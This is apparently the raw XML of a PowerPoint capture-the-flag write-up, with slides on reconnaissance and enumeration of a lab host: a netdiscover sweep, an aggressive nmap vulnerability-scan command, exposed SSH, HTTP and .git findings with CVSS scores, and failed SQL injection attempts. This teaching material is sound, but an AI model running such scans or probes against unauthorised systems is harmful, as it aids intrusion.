          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0" err="1"/>
              <a:t>Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We scanned the local devices around us to find our target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>               Upon locating the target device, we did a port scanning to see available services; using aggressive scan to identify potential exposed vulnerabilities, service versions, and the underlying operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> --version-all -O --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>osscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>-guess -A -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> --script vuln -T5 -p 21,22,80 192.168.139.143 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>oA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> /root/Desktop </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Open SSH Port (22):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The SSH service running on port 22 is openly accessible from any external IP address without any firewall restrictions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS Score: 8.1                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33E3C0CB-DFD0-F50D-9530-9BC10AFF22CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6816586" y="264977"/>
            <a:ext cx="5067300" cy="1919774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03360AF2-3C84-89C8-0E95-909BF6F0AFCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6816586" y="2459888"/>
            <a:ext cx="5039575" cy="1424940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8215BA27-562D-2D67-73C4-B4A9DBE6A885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect r="9300" b="40845"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6788862" y="4127500"/>
            <a:ext cx="5067299" cy="2044700"/>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410182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EF76-AB9F-8B32-A31C-3480C4A72A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C1978-2360-4B7D-5779-687B0E279F6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308114" y="228600"/>
            <a:ext cx="6629399" cy="6331225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0"/>
              <a:t>We found that port 80 (HTTP) was open and running Apache HTTP Server 2.4.41 on Ubuntu. The scan revealed a web application at /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0"/>
              <a:t> with a potential CSRF vulnerability in a form using the email field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Open HTTP Port (80):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The target system hosts a web application that is accessible over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>HTTP on port 80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> without encryption (HTTPS) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>without any Web Application Firewall (WAF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>Severity:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>Medium </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>CVSS Score: 6.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0"/>
              <a:t>One of the most critical discoveries was the presence of a publicly accessible Git repository at /.git/, which is a serious misconfiguration. This Git repo included a commit message indicating changes to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="1" i="1" dirty="0"/>
              <a:t>, hinting at manual modification and possibly weak development practices</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2300" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1" dirty="0"/>
              <a:t>Exposed .git Repository:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The target system had an accessible .git directory on its web server, which contained sensitive version control information including commit history, configuration files, and source code changes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>High, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>CVSS Score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>7.5   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB57AEA9-A6B8-2C8D-DEA0-4F9B23D46FA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="21295" b="50206"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115250" y="307513"/>
            <a:ext cx="4397865" cy="2168813"/>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ABD9E461-415C-42D3-34F7-045F15A6571A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="8173" r="31344" b="12792"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115251" y="3152142"/>
            <a:ext cx="4397865" cy="2313938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75FC8954-8F4F-A619-A795-B6EE607AB414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7907023" y="2440156"/>
            <a:ext cx="2814320" cy="374077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="99060" indent="-6350">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="930"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>aggressive scan results 2 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" i="1" kern="1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541A045-EDB7-4DEB-FA88-181C2FEDE9FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8023863" y="5432284"/>
            <a:ext cx="2580640" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>aggressive scan results 3 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83917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2E2D-7A49-72A2-49A6-0C0D6989F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9FA78-BD8C-80FA-3B21-054876B632D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640773" y="264977"/>
            <a:ext cx="10058400" cy="702498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" u="sng" dirty="0"/>
              <a:t>Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77955F7F-D857-3B80-456A-C80231E0F567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="967475"/>
            <a:ext cx="6241774" cy="5204725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>We entered Victim machine Ip in browser and found webpage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>Now to target the webpage, we had the login page. Unfortunately, this login page didn’t suffer from SQL injection commands we tried (most probably there was input sanitization) and the source code did not yield any clues.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> So, we went back to the ‘.git’ repository we found earlier during the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> scan.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FDD229B-58B5-9F80-575D-762CB698E0EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2124109" y="3094003"/>
            <a:ext cx="3344228" cy="2782570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1329412-AC8D-200B-FDBA-87180C566799}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459140" y="5902735"/>
            <a:ext cx="3009197" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>git repository on the webpage</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B74CDB4-5533-2651-D806-F8F9F5688D17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="-1865" r="5836" b="1865"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6714490" y="370489"/>
            <a:ext cx="5072946" cy="2723515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84525595-3E3B-CBB3-397A-C0F6D82D4C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8488963" y="78102"/>
            <a:ext cx="1524000" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t>target website</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0EFD3F7-F1E9-1F4A-DC82-FC00DD640539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect r="5836"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6714490" y="3429000"/>
            <a:ext cx="5072946" cy="2697480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F950A8-9836-81B2-AE8F-E1D77DB26233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7960643" y="3094003"/>
            <a:ext cx="2580640" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
              <a:t>target website login page</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1600" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2249144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46</TotalTime>
  <Words>3637</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>228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Wood Type</vt:lpstr>
      <vt:lpstr>CTF Exploitation Breakdown form Recon to Root Shell.</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Abstract</vt:lpstr>
      <vt:lpstr>Vulnerability Summery</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Mapping against OWASP TOP 10</vt:lpstr>
      <vt:lpstr>Reconnaissance &amp; Scanning</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Enumeration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and Commands Used in this Project:</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Cont..</vt:lpstr>
      <vt:lpstr>Risk/ Impact</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dc:creator>
  <cp:lastModifiedBy>Shubham K</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-04T05:59:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-04T06:48:18Z</dcterms:modified>
</cp:coreProperties>
</file>